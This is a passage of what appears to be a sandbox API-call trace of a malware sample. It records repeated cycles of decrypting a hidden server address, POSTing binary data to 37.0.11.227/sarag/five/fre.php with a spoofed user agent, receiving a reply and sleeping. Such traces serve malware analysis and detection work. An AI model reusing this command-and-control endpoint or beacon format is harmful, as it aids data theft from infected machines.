GetProcessHeap () returned 0x690000 [0174.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0174.052] recv (in: s=0x27c, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0174.126] GetProcessHeap () returned 0x690000 [0174.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac520 | out: hHeap=0x690000) returned 1 [0174.126] GetProcessHeap () returned 0x690000 [0174.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0174.127] GetProcessHeap () returned 0x690000 [0174.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac460 | out: hHeap=0x690000) returned 1 [0174.128] GetProcessHeap () returned 0x690000 [0174.128] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0174.129] closesocket (s=0x27c) returned 0 [0174.129] GetProcessHeap () returned 0x690000 [0174.129] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0174.129] GetProcessHeap () returned 0x690000 [0174.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0174.130] GetProcessHeap () returned 0x690000 [0174.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0174.132] GetProcessHeap () returned 0x690000 [0174.133] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0174.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x718) returned 0x27c [0174.135] Sleep (dwMilliseconds=0xea60) [0174.143] GetProcessHeap () returned 0x690000 [0174.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0174.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.147] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0174.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.162] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0174.173] GetProcessHeap () returned 0x690000 [0174.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0174.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.175] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0174.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.176] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0174.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.180] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.180] GetProcessHeap () returned 0x690000 [0174.180] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0174.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.182] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0174.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.183] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0174.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.185] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0174.185] GetProcessHeap () returned 0x690000 [0174.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0174.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.186] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0174.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.188] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0174.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.189] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0174.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.190] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0174.190] GetProcessHeap () returned 0x690000 [0174.190] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0174.190] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0174.191] GetProcessHeap () returned 0x690000 [0174.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0174.192] GetProcessHeap () returned 0x690000 [0174.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0174.192] GetProcessHeap () returned 0x690000 [0174.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0174.192] GetProcessHeap () returned 0x690000 [0174.192] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0174.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.194] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0174.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.204] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0174.216] GetProcessHeap () returned 0x690000 [0174.216] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0174.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.217] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0174.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.219] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0174.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.220] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.220] GetProcessHeap () returned 0x690000 [0174.220] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0174.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.224] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0174.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.226] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0174.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.227] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0174.227] GetProcessHeap () returned 0x690000 [0174.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0174.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.228] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0174.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.229] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0174.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.231] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0174.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.232] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0174.232] GetProcessHeap () returned 0x690000 [0174.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0174.232] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae880*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0174.233] GetProcessHeap () returned 0x690000 [0174.233] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0174.233] socket (af=2, type=1, protocol=6) returned 0x280 [0174.233] connect (s=0x280, name=0x6ae880*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0174.259] FreeAddrInfoW (pAddrInfo=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae880*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0174.259] GetProcessHeap () returned 0x690000 [0174.259] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0174.259] GetProcessHeap () returned 0x690000 [0174.259] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0174.260] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0174.261] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0174.261] GetProcessHeap () returned 0x690000 [0174.261] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac460 [0174.261] GetProcessHeap () returned 0x690000 [0174.262] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0174.262] GetProcessHeap () returned 0x690000 [0174.262] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0174.262] GetProcessHeap () returned 0x690000 [0174.262] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0174.263] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0174.264] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0174.264] GetProcessHeap () returned 0x690000 [0174.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac520 [0174.264] GetProcessHeap () returned 0x690000 [0174.265] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0174.265] send (s=0x280, buf=0x6ac520*, len=242, flags=0) returned 242 [0174.265] send (s=0x280, buf=0x6aba40*, len=159, flags=0) returned 159 [0174.265] GetProcessHeap () returned 0x690000 [0174.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0174.265] recv (in: s=0x280, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0174.336] GetProcessHeap () returned 0x690000 [0174.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac520 | out: hHeap=0x690000) returned 1 [0174.336] GetProcessHeap () returned 0x690000 [0174.337] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0174.337] GetProcessHeap () returned 0x690000 [0174.337] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac460 | out: hHeap=0x690000) returned 1 [0174.337] GetProcessHeap () returned 0x690000 [0174.337] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0174.337] closesocket (s=0x280) returned 0 [0174.338] GetProcessHeap () returned 0x690000 [0174.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0174.338] GetProcessHeap () returned 0x690000 [0174.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0174.338] GetProcessHeap () returned 0x690000 [0174.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0174.339] GetProcessHeap () returned 0x690000 [0174.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0174.340] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6d0) returned 0x280 [0174.341] Sleep (dwMilliseconds=0xea60) [0174.345] GetProcessHeap () returned 0x690000 [0174.345] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0174.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.346] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0174.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.353] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0174.361] GetProcessHeap () returned 0x690000 [0174.361] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0174.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.362] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0174.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.364] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0174.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.367] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.367] GetProcessHeap () returned 0x690000 [0174.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0174.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.369] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0174.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.370] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0174.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.371] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0174.371] GetProcessHeap () returned 0x690000 [0174.371] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a5fa0 [0174.386] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.389] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0174.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.390] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0174.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.392] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0174.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.398] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0174.398] GetProcessHeap () returned 0x690000 [0174.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0174.398] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0174.399] GetProcessHeap () returned 0x690000 [0174.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0174.399] GetProcessHeap () returned 0x690000 [0174.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a5fa0 | out: hHeap=0x690000) returned 1 [0174.400] GetProcessHeap () returned 0x690000 [0174.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0174.400] GetProcessHeap () returned 0x690000 [0174.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0174.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.402] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0174.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.408] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0174.418] GetProcessHeap () returned 0x690000 [0174.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0174.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.422] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0174.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.423] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0174.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.434] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.434] GetProcessHeap () returned 0x690000 [0174.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0174.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.437] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0174.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.451] CryptDestroyKey (hKey=0x69d028) returned 1 [0174.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0174.489] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0174.489] GetProcessHeap () returned 0x690000 [0174.489] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0174.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.490] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0174.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.493] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0174.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.495] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0174.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.496] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0174.496] GetProcessHeap () returned 0x690000 [0174.496] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0174.496] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae868*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0174.496] GetProcessHeap () returned 0x690000 [0174.496] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0174.496] socket (af=2, type=1, protocol=6) returned 0x284 [0174.496] connect (s=0x284, name=0x6ae868*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0174.521] FreeAddrInfoW (pAddrInfo=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae868*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0174.521] GetProcessHeap () returned 0x690000 [0174.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0174.521] GetProcessHeap () returned 0x690000 [0174.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0174.522] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0174.523] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0174.523] GetProcessHeap () returned 0x690000 [0174.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac460 [0174.523] GetProcessHeap () returned 0x690000 [0174.523] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0174.523] GetProcessHeap () returned 0x690000 [0174.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0174.523] GetProcessHeap () returned 0x690000 [0174.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0174.541] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0174.542] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0174.542] GetProcessHeap () returned 0x690000 [0174.542] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac520 [0174.542] GetProcessHeap () returned 0x690000 [0174.542] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0174.542] send (s=0x284, buf=0x6ac520*, len=242, flags=0) returned 242 [0174.543] send (s=0x284, buf=0x6aba40*, len=159, flags=0) returned 159 [0174.543] GetProcessHeap () returned 0x690000 [0174.543] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0174.543] recv (in: s=0x284, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0174.765] GetProcessHeap () returned 0x690000 [0174.766] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac520 | out: hHeap=0x690000) returned 1 [0174.766] GetProcessHeap () returned 0x690000 [0174.766] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0174.766] GetProcessHeap () returned 0x690000 [0174.767] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac460 | out: hHeap=0x690000) returned 1 [0174.767] GetProcessHeap () returned 0x690000 [0174.767] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0174.767] closesocket (s=0x284) returned 0 [0174.768] GetProcessHeap () returned 0x690000 [0174.769] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0174.769] GetProcessHeap () returned 0x690000 [0174.769] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0174.769] GetProcessHeap () returned 0x690000 [0174.770] HeapFree (in: hHeap=0x690000, dwFlags=0x0, 